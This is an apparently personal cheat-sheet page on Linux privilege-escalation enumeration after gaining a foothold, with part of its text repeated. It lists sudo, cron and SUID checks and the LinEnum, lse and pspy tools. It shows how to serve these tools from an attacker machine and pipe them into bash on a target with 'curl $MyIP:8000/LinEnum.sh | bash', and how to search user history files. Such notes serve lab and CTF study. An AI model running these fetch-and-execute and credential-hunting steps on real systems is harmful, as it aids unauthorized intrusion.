2 Enums

Start

sudo -l
crontab -l
ps auxww
uname -a
find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null

pspy   ..snoop processes
find / -type f -user www-data 2>/dev/null    ..files
find / -type d -user www-data 2>/dev/null    ..dirs

LinEnum

https://github.com/rebootuser/LinEnum
Extracts large amount of target bits
Could find ports listening on localhost, that might have port-knocking or pivots
Used by IPPSec

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
cp /opt/LinEnum/LinEnum.sh .
python -m SimpleHTTPServer 80

cd /dev/shm/   ..ramdisk (data wont actually save to disk)
cd /tmp        ..optional (way i've been doing it)

curl $MyIP:8000/LinEnum.sh -t | bash       ..Easy execute and Thorough
curl $MyIP:8000/LinEnum.sh -o LinEnum.sh   ..Download

LinEnum.sh -h                         ..help
LinEnum.sh -k password -e export -t   ..keyword, export, thorough

Linux Smart Enumeration

wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
lse.sh -h         ..help
lse.sh -l 1 -i    ..level 1.. i to not prompt-pass
lse.sh -l 2 -i    ..level 2.. print everything

PsPy32

Snoop on processes/crons without needing root permissions.
Even finds root-crontabs
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

Copy it to the system with:
chmod +x pspy32
python -m SimpleHTTPServer 80
wget http://10.10.14.34/pspy32
> ./pspy32
> ./pspy --help

Timers

Kinda like crons
REF: procmon

systemctl list-timers
watch -n 1 'systemctl list-timers'

Tools

Get the tools.zip from UdemyClass, and save them as a toolset

REFS

Bonus Enums:

SUID/SGID

find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null

Writeable

cd /var/www/html/webservices/monstra/
find . -writable -ls

Enumeration Plan

Check your id, whoami
Linux Smart Enumeration (lse) with increasing levels
1. lse
2. lse -l 1
3. lse -l 2
LinEnum and other scripts
If they are failing, run them manually
1. Or Check other cheatsheets
2. https://blog.g0tmi1k.com/..linux-privilege-escalation
Check common file
1. /var/backup
2. /var/logs
3. /tmp
4. /home/user/.*history

Try easy ones first:

sudo, cron, suid
root processes, enumerate version, check exploits
internal ports you can forward to your-remote-machine

Harder:

Re-read your enums, look for oddities
Unusual file-systems (not ext,swap,tmpfs)
Strange usernames
Kernel exploits

Previous1 Look Around Next3 PrivEsc

Last updated 2 years ago

Was this helpful?

sudo -l crontab -l ps auxww uname -a find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null pspy ..snoop processes find / -type f -user www-data 2>/dev/null ..files find / -type d -user www-data 2>/dev/null ..dirs

LinEnum

https://github.com/rebootuser/LinEnum

Extracts large amount of target bits

Could find ports listening on localhost, that might have port-knocking or pivots

Used by IPPSec

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
cp /opt/LinEnum/LinEnum.sh .
python -m SimpleHTTPServer 80

cd /dev/shm/   ..ramdisk (data wont actually save to disk)
cd /tmp        ..optional (way i've been doing it)

curl $MyIP:8000/LinEnum.sh -t | bash       ..Easy execute and Thorough
curl $MyIP:8000/LinEnum.sh -o LinEnum.sh   ..Download

LinEnum.sh -h                         ..help
LinEnum.sh -k password -e export -t   ..keyword, export, thorough

wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh lse.sh -h ..help lse.sh -l 1 -i ..level 1.. i to not prompt-pass lse.sh -l 2 -i ..level 2.. print everything

PsPy32

Copy it to the system with:
chmod +x pspy32
python -m SimpleHTTPServer 80
wget http://10.10.14.34/pspy32
> ./pspy32
> ./pspy --help

Enumeration Plan

Check your id, whoami

Linux Smart Enumeration (lse) with increasing levels

lse
lse -l 1
lse -l 2

LinEnum and other scripts

If they are failing, run them manually

Or Check other cheatsheets
https://blog.g0tmi1k.com/..linux-privilege-escalation

Check common file

/var/backup
/var/logs
/tmp
/home/user/.*history

Try easy ones first:

sudo, cron, suid

root processes, enumerate version, check exploits

internal ports you can forward to your-remote-machine

Harder:

Re-read your enums, look for oddities

Unusual file-systems (not ext,swap,tmpfs)

Strange usernames

Kernel exploits